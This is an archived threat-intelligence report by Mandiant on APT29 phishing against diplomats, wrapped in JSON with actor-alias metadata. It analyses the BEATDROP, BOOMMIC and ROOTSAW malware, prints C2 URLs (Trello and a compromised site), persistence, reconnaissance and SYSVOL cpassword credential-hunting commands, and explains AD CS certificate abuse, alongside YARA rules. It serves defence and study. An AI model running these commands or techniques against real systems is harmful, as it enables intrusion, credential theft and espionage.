{
	"id": "46cc0b33-b6a4-4525-8e28-0bf7dc55d88e",
	"created_at": "2026-04-06T00:07:28.429663Z",
	"updated_at": "2026-04-10T03:37:32.758914Z",
	"deleted_at": null,
	"sha1_hash": "6fb2dc9b04e89e68f35b966ff99a69b682a3a9c2",
	"title": "Tracking APT29 Phishing Campaigns | Atlassian Trello",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4352994,
	"plain_text": "Tracking APT29 Phishing Campaigns | Atlassian Trello\r\nBy Mandiant\r\nPublished: 2022-04-28 · Archived: 2026-04-05 20:18:02 UTC\r\nWritten by: John Wolfram, Sarah Hawley, Tyler McLellan, Nick Simonian, Anders Vejlby\r\nSince early 2021, Mandiant has been tracking extensive APT29 phishing campaigns targeting diplomatic organizations in Europe, the Americas, and Asia. This blog post discusses our recent observations related to the identification of two new malware families in 2022, BEATDROP and BOOMMIC, as well as APT29’s efforts to evade detection through retooling and abuse of Atlassian's Trello service.\r\nAPT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the Foreign Intelligence Service (SVR). The diplomatic-centric targeting of this recent activity is consistent with Russian strategic priorities as well as historic APT29 targeting. Mandiant previously tracked this intrusion activity under multiple clusters, UNC2652 and UNC2542, which were recently merged into APT29 in April 2022. Some APT29 activity is also publicly referred to as Nobelium by Microsoft.\r\nSummary\r\nBeginning mid-January 2022, Mandiant detected and responded to an APT29 phishing campaign targeting a diplomatic entity. During the investigation, Mandiant identified the deployment and use of the BEATDROP and BOOMMIC downloaders. Shortly following the identification of this campaign, Mandiant discovered APT29 targeting multiple additional diplomatic and government entities through a series of phishing waves.\r\nThe phishing emails sent by APT29 masqueraded as administrative notices related to various embassies and utilized legitimate but co-opted email addresses to send emails and Atlassian's Trello service for command and control (C2). 
These phishing emails were similar to previous Nobelium phishing campaigns in 2021 as they targeted diplomatic organizations, used ROOTSAW (publicly known as EnvyScout) to deliver additional payloads, and misused Firebase or DropBox for C2. The misuse of legitimate webservices such as Trello, Firebase, or DropBox is likely an attempt to make detection or remediation harder.\r\nFigure 1: 2022 Campaign Timeline\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 1 of 14\n\nAn operational shift was observed in February 2022 when APT29 moved from deploying BEATDROP, which used a third-party cloud service to retrieve BEACON, to a simpler BEACON dropper that relied on co-opted infrastructure. The subsequent sections will highlight the Tactics, Techniques, and Procedures as well as the tooling used by APT29 in their latest phishing campaigns.\r\nFigure 2: Campaign Attack Lifecycle identified during 2022\r\nInitial Access\r\nTo gain access to a victim environment, APT29 sent spear-phishing emails disguised as embassy administrative updates. These phishing emails used legitimate, but compromised email addresses from other diplomatic entities. APT29 targeted large lists of recipients that Mandiant suspected were primarily publicly listed points of contact of embassy personnel. These phishing emails utilized a malicious HTML dropper tracked as ROOTSAW, which makes use of a technique known as HTML smuggling to deliver an IMG or ISO file to a victim system.\r\nFigure 3: Example APT29 Phishing Lure, with an attached file Covid.html\r\nWhen opened, the ROOTSAW HTML dropper will write an IMG or ISO file to disk. On Windows 10 or later, the image file is mounted when double-clicked and the user is presented with the image file as the folder contents in Windows Explorer. The image file contains two additional files, a Windows shortcut (LNK) file and a malicious DLL. 
If the user clicks the LNK file, the “Target” command will execute as normal. This mechanism lures the victim into opening the LNK file and thus inadvertently launches the malicious DLL.\r\nFiles contained within image files, like mounted ISO files, will not contain the Zone.Identifier Alternate Data Stream (ADS) flag that indicates the files have been downloaded from the internet (so called “mark-of-the-web”), as reported by Didier Stevens. This prevents a Windows operating system warning message for files opened from ISO or IMG image files.\r\nFigure 4: An example ISO file delivered as part of a Covid-related phishing email, without the malicious DLL or parent folder visible. In this case, the DLL is executed by rundll32.exe as referenced by the lure “Covid” LNK shortcut file.\r\nThe LNK utilized by APT29 in the early waves of this campaign shared multiple characteristics with those identified in campaigns from 2021, including the use of a specific icon location, as well as the machine ID and MAC address. One technique observed being used by APT29 was giving the LNK file an icon different from that of the target application or document, making the shortcut appear as a document rather than a program to launch. This tricks the victim into opening a seemingly legitimate document. 
Shortcut files by default also have their LNK file extension hidden, even if the Windows Explorer “show file extensions” option is enabled, further lowering any suspicion that a shortcut, rather than a document, is being opened.\r\n[icon_location] {'string': 'C:\\\\windows\\\\System32\\\\imageres.dll'}\r\nFigure 5: LNK Icon Path metadata\r\nThe “Target” in the LNK will execute the DLL with rundll32.exe and one of the DLL’s exports:\r\n[location_info] local_path: C:\\Windows\\System32\\rundll32.exe\r\n[command_line_arguments] string: trello.dll Trello\r\nFigure 6: Example LNK execution metadata for BEATDROP malicious DLLs\r\nMandiant also identified APT29 utilizing a malicious docx to deliver an HTA dropper, resulting in the delivery and execution of BEATDROP on a target system, in a separate but similar phishing campaign.\r\nFigure 7: APT29 BEATDROP Execution chain\r\nBEATDROP is a downloader written in C that makes use of Trello for C2. Once executed, BEATDROP first maps its own copy of `ntdll.dll` into memory for the purpose of executing shellcode in its own process. BEATDROP then creates a suspended thread with RtlCreateUserThread, which points to NtCreateFile.\r\nFollowing this, BEATDROP will enumerate the system for the username, computer name, and IP address. This information is used to create a victim ID, which is used by BEATDROP to store and retrieve victim payloads from its C2. Once the victim ID is created, BEATDROP will make an initial request to Trello to identify whether the current victim has already been compromised. 
The process to identify whether the victim is already compromised begins with a GET request to retrieve the user ID from the following URL:\r\nhttps://api.trello.com/1/members/me/boards?key=\u003credacted\u003e\u0026token=\u003credacted\u003e\r\nFigure 9: BEATDROP User ID URL\r\nBEATDROP then uses the user ID received from the URL in Figure 9 to list the boards related to the user, which contain all current victims.\r\nhttps://api.trello.com/1/boards/\u003cuser_id\u003e/lists?key=\u003credacted\u003e\u0026token=\u003credacted\u003e\r\nFigure 10: BEATDROP User ID boards URL\r\nBEATDROP enumerates the victim boards to identify whether the current target already exists in the database. If it does not, BEATDROP crafts a POST request to add the victim to the database using the data enumerated from the host.\r\n{\r\n \"id\": \"\u003cvaries\u003e\",\r\n \"name\": \"username\\ncomputername\\nip_address\",\r\n \"closed\": false,\r\n \"pos\": 0.5,\r\n \"softLimit\": null,\r\n \"idBoard\": \"\u003credacted\u003e\",\r\n \"subscribed\": false\r\n}\r\nFigure 11: Example BEATDROP Victim Entry\r\nOnce the victim is either identified or added to the database, BEATDROP will send a request to gather the victim board for the current target:\r\nhttps://api.trello.com/1/lists/\u003clist_id\u003e/cards?key=\u003credacted\u003e\u0026token=3\u003credacted\u003e\r\nFigure 12: BEATDROP Victim Board URL\r\nBEATDROP will then enumerate the response to determine if a payload exists for the current victim. If one does, BEATDROP will then send a request to determine the URL to retrieve the final payload. 
The final URL delivers the AES-encrypted payload as its response.\r\nhttps://api.trello.com/1/cards/\u003credacted\u003e/attachments?key=\u003credacted\u003e\u0026token=\u003credacted\u003e\r\nFigure 13: BEATDROP Victim Attachment Board URL\r\nhttps://trello.com/1/cards/\u003credacted\u003e/attachments/\u003credacted\u003e/download/\u003cpayload name\u003e\r\nFigure 14: BEATDROP Final Payload URL\r\nFor most of the aforementioned requests to the Trello API, the key and token inserted as URL parameters are enough to retrieve the information from the Trello API. In the case of using the download API, however, Trello requires the use of a header, which is also embedded in the BEATDROP samples:\r\nAuthorization: OAuth oauth_consumer_key=\"\u003credacted\u003e\", oauth_token=\"\u003credacted\u003e\"\r\nFigure 15: BEATDROP Authorization Header\r\nAnalysis of early BEATDROP samples identified that the malware utilized an interesting User Agent when communicating with its C2. The initial User Agent string was related to Apple iPads; however, Mandiant observed a shift in TTPs in later BEATDROP samples to utilizing more commonly observed Windows User Agent strings.\r\nMozilla/5.0 (iPad; CPU OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/\r\nFigure 16: Initial BEATDROP User Agent string\r\nFigure 17: BEATDROP writing shellcode to memory\r\nFigure 18: BEATDROP resuming thread of mapped NTDLL\r\nBEATDROP is an ideal example of APT29’s continued efforts to obfuscate its activity and maintain persistent access.\r\nFollowing multiple waves of phishing utilizing BEATDROP to target diplomatic entities, Mandiant along with other researchers identified APT29 moving away from BEATDROP to a novel C++ BEACON loader in their latest campaigns against diplomatic entities. 
Several scenarios could explain this shift in tooling, including the possibility that BEATDROP was no longer providing value to the group in terms of capability, or that the shift reflects an operational practice of periodically retooling for the purpose of evading detection.\r\nEstablish Foothold\r\nFollowing the successful deployment of BEATDROP to deliver and execute a payload, APT29 was observed leveraging BOOMMIC to further establish a foothold within the environment. BOOMMIC, also known as VaporRage by Microsoft, is a shellcode downloader written in C that communicates over HTTP to co-opted infrastructure used for C2. APT29 executed BOOMMIC through DLL Side Loading of a modified version.dll by a legitimate Java binary, jucheck.exe.\r\nAPT29 first deployed BOOMMIC within minutes following the successful execution of BEATDROP. The group deployed the malicious BOOMMIC DLL javafx_font.dll (363a95777f401df40db61148593ea387) alongside two additional files:\r\njucheck.exe (da24b2783758ff5ccc2d0f5ebcc2a218)\r\nversion.dll (8bb3d91b666813372e66903209bd45fd)\r\nPrior to executing BOOMMIC, APT29 was observed creating persistence via a registry key for “Java Update” that would execute jucheck.exe from the directory that contained version.dll and the BOOMMIC payload.\r\nreg add \"HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"Java Update\" /t REG_SZ /d \"c:\\users\\\u003credacted\u003e\\appdata\\\r\nFigure 19: BOOMMIC Persistence\r\nAPT29 then executed jucheck.exe via wmic, which then loaded and executed BOOMMIC based on DLL Side Loading.\r\nwmic process call create \"c:\\users\\\u003credacted\u003e\\appdata\\local\\Java\\jucheck.exe\"\r\nFigure 20: APT29 execution of BOOMMIC\r\nVersion.dll and jucheck.exe are both important pieces of the execution chain used to launch BOOMMIC. Jucheck.exe is a legitimate Java binary used to check for any updates. This file will load version.dll upon its execution. 
Version.dll is an unsigned and modified copy of a signed legitimate Windows DLL, normally found under %SYSTEMROOT%\\System32, but retains its PE header. An additional import was added to the modified version.dll, which imports the malicious function from javafx_font.dll.\r\nFigure 21: CFF Explorer view of version.dll imports, left the original and right the modified DLL, with the additional javafx_font.dll added to the import table in the malicious DLL\r\nWhen version.dll imports BOOMMIC, it also executes BOOMMIC’s DllMain function, which can be seen in Figure 22.\r\nFigure 22: BOOMMIC DLLMain\r\nWithout the modified version.dll present in the directory from which jucheck.exe is launched, executing jucheck.exe will not result in BOOMMIC running.\r\nBOOMMIC, similar to previous reporting by Microsoft on VaporRage, contains multiple export functions. In the case of 363a95777f401df40db61148593ea387, the export function that contains the primary functionality of BOOMMIC is Java_com_sun_javafx_font_PrismFontFactory_getLCDContrastWin32.\r\nFigure 23: BOOMMIC Exports\r\nThe primary function of BOOMMIC is to download and load shellcode payloads into memory on a target. Once executed, BOOMMIC first checks if it is running under the process jucheck.exe; if it is not, the program will exit. Analysis of BOOMMIC identified that strings throughout the program are encoded using XOR, alternating the key bytes 0x0C and 0x4D.\r\nFigure 24: BOOMMIC check for jucheck.exe\r\nIf the malware is running under jucheck.exe, it will then create a host id for the compromised target to be used in the request to download a payload. The host id is created by hex-encoding the DNS domain and legacy account name of the target system. 
These values are then formatted in the following manner: dns_domain_account_name, after both dns_domain and account_name are encoded by adding 3 to the ordinal of each character.\r\nFigure 25: BOOMMIC host id creation\r\nOnce the host id has been created, BOOMMIC passes this value to the function used to download and execute payloads, to be used as part of the request. BOOMMIC then sends a GET request to its C2 to download and execute a shellcode payload.\r\nMandiant observed APT29 leveraging compromised websites as the C2 for BOOMMIC. Once a payload is successfully downloaded, BOOMMIC XOR decodes and then executes it in memory.\r\nhttps://maybyrne[.]co[.]uk/modules/mod_search/mod_global_search.php?bin_data=\u003chost_id\u003e\u0026Article=AboutMe\r\nFigure 26: Example of a BOOMMIC GET request, misusing a compromised website as C2\r\nEscalate Privileges\r\nMandiant observed APT29 quickly move to escalate their privileges within domains once access was established. In multiple cases, APT29 was able to gain Domain Admin in less than 12 hours from the initial phishing payload’s execution. APT29 was observed utilizing a variety of TTPs to escalate their privileges. In one instance, APT29 was observed writing files that contained Kerberos tickets, most likely to be used in Pass the Ticket attacks or for offline cracking.\r\nAPT29 was also observed exploiting misconfigured certificate templates to allow them to impersonate admin users. From here, APT29 created additional malicious certificates which they used to move laterally within the environment. 
This recent technique, which is well documented in a report from SpecterOps and was presented at Black Hat in August 2021, gives the attacker the ability to quickly escalate their privileges within the environment, but also provides a method for long-term persistence through the creation of malicious certificates.\r\nA brief overview of the technique as used by APT29 in actual compromises that Mandiant investigated follows.\r\nMicrosoft offers “Active Directory Certificate Services” (AD CS) for providing certificate enrollment, revocation and trust setup. It allows for setting up the “Public Key Infrastructure” (PKI) needed for issuing certificates for internal HTTPS sites, VPNs, certificate-based authentication, etc.\r\nAD CS will enable the setup of “Certificate Templates” that are used when generating new certificates. The particular misconfiguration abused by APT29, referenced by SpecterOps as ESC1, allows low-privileged users to escalate directly to Domain Admin. Related to this specific case of abuse, three distinct settings on a certificate template are important:\r\nWho can request a certificate using the template\r\nWhat is the allowed usage of a certificate from the template\r\nIs a Subject Alternative Name (SAN) allowed\r\nWhat are the issuance requirements\r\nIn multiple cases the attacker found certificate templates with “Domain Users” enrollment rights, meaning all users can request the certificate, a usage including “Client Authentication”, meaning the certificate can be used to authenticate users, and a setting allowing the Subject and SAN to be specified by the requester (“ENROLLEE_SUPPLIES_SUBJECT”).\r\nWhen performing authentication to Active Directory with Kerberos using the Public Key Cryptography for Initial Authentication (PKINIT) Kerberos flow, the Domain Controller will verify the SAN against the User Principal Name (UPN) of the authenticating principal. 
Therefore, being allowed to specify an arbitrary SAN allows the requester of the certificate to impersonate any principal in the domain.\r\nThese settings allowed the attacker to request a certificate with a low-privileged account, specify a high-privileged account in the SAN field, and use this certificate for authentication. The practical steps beyond the aforementioned creation of the certificate are to use the certificate with a request for a Ticket Granting Ticket (TGT) and then use that TGT for authentication.\r\nThe linked SpecterOps document provides much more detail and additional techniques besides this one example.\r\nReconnaissance\r\nOnce APT29 established access, Mandiant observed the group performing extensive reconnaissance of hosts and the Active Directory environment. The group was also observed conducting on-host reconnaissance looking for credentials.\r\nOne of the first commands employed by the group was the Windows net command. APT29 was observed using the net command widely to enumerate users and groups.\r\n net use\r\n net localgroup Administrators\r\n net1 localgroup Administrators\r\n net user /domain \u003credacted\u003e\r\n net group /domain \"Enterprise Admins\"\r\nFigure 27: APT29 net recon commands\r\nAPT29 was also observed by Mandiant using nltest to enumerate Domain Controllers on the domain:\r\n C:\\\\WINDOWS\\\\system32\\\\cmd.exe /C nltest /dclist:DOMAIN\r\nFigure 28: APT29 nltest recon\r\nOne notable TTP observed by APT29 was the hunting for passwords stored in SYSVOL. This technique relies on passwords that are stored as part of Group Policy Preferences. Passwords stored in this way are encrypted using a known scheme that can easily be decrypted. Microsoft fixed this in MS14-025, which removed the option of configuring Group Policy Preferences with the “cpassword”. 
While the patch was issued in 2014, it is still possible to come across systems with passwords stored in Group Policy Preferences, either due to the patch never having been applied or because the patch does not remove existing Group Policy Preferences that contain passwords (as Microsoft does not risk breaking existing functionality).\r\nC:\\WINDOWS\\system32\\cmd.exe /C findstr /S /I cpassword \\\\DOMAIN\\sysvol\\DOMAIN\\policies\\*.xml\r\nFigure 29: APT29 GPP password datamining\r\nLateral Movement\r\nMandiant observed APT29 quickly moving laterally within an environment. To facilitate lateral movement, APT29 relied on a combination of malicious certificates used for impersonation of privileged users and SMB BEACON.\r\nAPT29 was first observed moving laterally after the group was seen staging and deploying SMB BEACON to multiple systems. To facilitate the staging of BEACON on remote systems, APT29 utilized a malicious certificate that allowed the group to impersonate a privileged user. The first evidence of SMB BEACON being deployed was seen through the local staging of a zip file shortly following the successful execution of BOOMMIC.\r\npowershell -c \"expand-archive SharedReality.zip SharedReality.dll\"\r\nFigure 30: SMB BEACON staging\r\nAnalysis of SharedReality.dll identified it to be a memory-only dropper written in the Go language that decrypts and executes an embedded BEACON payload. The BEACON payload was identified to be SMB BEACON that communicates over the following named pipe:\r\n\\\\.\\pipe\\SapIServerPipes-1-15-21-07836\r\nFigure 31: SharedReality.dll Named Pipe\r\nAPT29 was then observed utilizing the impersonation of a privileged user to copy SharedReality.dll to the Temp directory of multiple systems. The group then deployed it via a scheduled task named SharedRealitySvcDLC which was installed and executed. 
After the scheduled task executed, it was immediately deleted.\r\nschtasks /create /s \u003cREDACTED\u003e /tn \"SharedRealitySvcDLC\" /ru SYSTEM /tr \"C:\\Windows\\System32\\rundll32.exe c:\\Windows\\Tem\r\nFigure 32: BEACON Scheduled Task\r\nMaintain Presence and Complete Mission\r\nAs previously noted, Mandiant has observed the group widely using scheduled tasks, run keys, malicious certificates, and in-memory backdoors, in some cases multiple per system. The use of these techniques and tools represents the multiple means by which APT29 attempts to maintain access within an environment. This is further supported by the activity identified by Mandiant that saw APT29 writing zip files that contained Kerberos tickets as well as the creation and most likely exportation of malicious certificates.\r\nThe totality of the TTPs used by APT29 supports the assessment that APT29's goal in these campaigns is to establish multiple means of long-term access to facilitate intelligence collection for espionage purposes within the targeted diplomatic entities’ victim networks.\r\nOutlook and Implications\r\nThis latest wave of spear phishing showcases APT29’s enduring interest in obtaining diplomatic and foreign policy information from governments around the world. The shift away from BEATDROP to BEACON further highlights the group’s efforts to vary its TTPs and alter BEACON delivery mechanisms via spear phishing campaigns that follow a notable pattern.\r\nMandiant anticipates sustained waves of phishing activity by APT29 that employ novel tools and infrastructure to hinder detection. While these campaigns are likely to be directed against diplomatic missions and foreign policy information as part of the group’s mandate to support Russian strategic interests, the invasion of Ukraine and heightened tensions between the West, Europe, and Russia are likely to influence the intensity and urgency of collection operations. 
\r\nMalware Descriptions\r\nDuring this phishing campaign, Mandiant observed APT29 utilizing the following malware families:\r\nBEATDROP:\r\nBEATDROP is a downloader written in C that uses Atlassian's project management service Trello for C\u0026C. BEATDROP uses Trello to store victim information and retrieve AES-encrypted shellcode payloads to be executed. BEATDROP then injects and executes downloaded payloads into a suspended process.\r\nUpon execution, BEATDROP maps a copy of ntdll.dll into memory to execute shellcode in its own process. The sample then creates a suspended thread with RtlCreateUserThread; the thread points to NtCreateFile. The sample changes execution to shellcode and resumes the thread. The shellcode payload is retrieved from Trello and is targeted per victim. Once the payload has been retrieved, it is deleted from Trello.\r\nBOOMMIC:\r\nBOOMMIC, publicly referred to as VaporRage, is a shellcode downloader written in C that communicates over HTTPS. Shellcode payloads are retrieved from a hardcoded C2 that uses an encoded host_id generated from the target's domain and account name. BOOMMIC XOR decodes the downloaded shellcode payload in memory and executes it.\r\nBOOMMIC is executed by jucheck.exe through DLL side-loading that executes a malicious javafx_font.dll BOOMMIC payload.\r\nROOTSAW:\r\nROOTSAW, publicly referred to as EnvyScout, is a dropper HTML file that contains JavaScript which XOR- and Base64-decodes an embedded ISO/IMG file to be further executed.\r\nBEACON:\r\nBEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. Supported backdoor commands include shell command execution, file transfer, file execution, and file management. BEACON can also capture keystrokes and screenshots as well as act as a proxy server. 
BEACON may also be tasked with harvesting system credentials, port scanning, and enumerating systems on a network. BEACON communicates with a C2 server via HTTP or DNS.\r\nTechnical Indicators\r\nDetections\r\nrule M_APT_Downloader_BEATDROP\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looking for BEATDROP malware\"\r\n strings:\r\n 
$ntdll1 = \"ntdll\" ascii fullword\r\n $ntdll2 = \"C:\\\\Windows\\\\System32\\\\ntdll.dll\" ascii fullword nocase\r\n $url1 = \"api.trello.com\" ascii\r\n $url2 = \"/members/me/boards?key=\" ascii\r\n $url3 = \"/cards?key=\" ascii\r\n condition:\r\n uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize \u003c 1MB and all of them\r\n}\r\nimport \"pe\"\r\nrule M_APT_Downloader_BOOMMIC {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looking for BOOMMIC malware\"\r\n strings:\r\n $loc_10001000 = { 55 8B EC 8D 45 0C 50 8B 4D 08 51 6A 02 FF 15 [4] 85 C0 74 09 B8 01 00 00 00 EB 04 EB 02 33 C0 5D\r\n $loc_100012fd = {6A 00 8D 55 EC 52 8B 45 D4 50 6A 05 8B 4D E4 51 FF 15 }\r\n $func1 = \"GetComputerNameExA\" ascii\r\n $func2 = \"HttpQueryInfoA\" ascii\r\n condition:\r\n uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize \u003c 1MB and\r\n (\r\n ($loc_10001000 and $func1) or\r\n ($loc_100012fd and $func2)\r\n )\r\n}\r\nThu, 04/28/2022 - 10:21\r\nSource: https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns"
	],
	"report_names": [
		"tracking-apt29-phishing-campaigns"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434048,
	"ts_updated_at": 1775792252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6fb2dc9b04e89e68f35b966ff99a69b682a3a9c2.pdf",
		"text": "https://archive.orkl.eu/6fb2dc9b04e89e68f35b966ff99a69b682a3a9c2.txt",
		"img": "https://archive.orkl.eu/6fb2dc9b04e89e68f35b966ff99a69b682a3a9c2.jpg"
	}
}
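The `threat_actors` array above carries the same actor (APT29 / UNC2452 / Cozy Bear) as eight separate records from ETDA, MITRE, Secureworks and MISP Galaxy, with aliases that differ only in spacing, casing or trailing whitespace ("APT29 ", "APT 29", "NOBELIUM", "Nobelium", "Iron Hemlock", "IRON HEMLOCK"). Anyone enriching alerts against this data needs to collapse those records into one actor before matching. The following Python is an added example, not part of the archived ORKL record or its tooling: it normalizes every name to a canonical key and unions records that share any key. The `SAMPLE` list is a constructed subset that mirrors the record's field names (`main_name`, `aliases`, `source_name`), including the stray trailing spaces, so the merge behaviour on the real data can be seen offline.

```python
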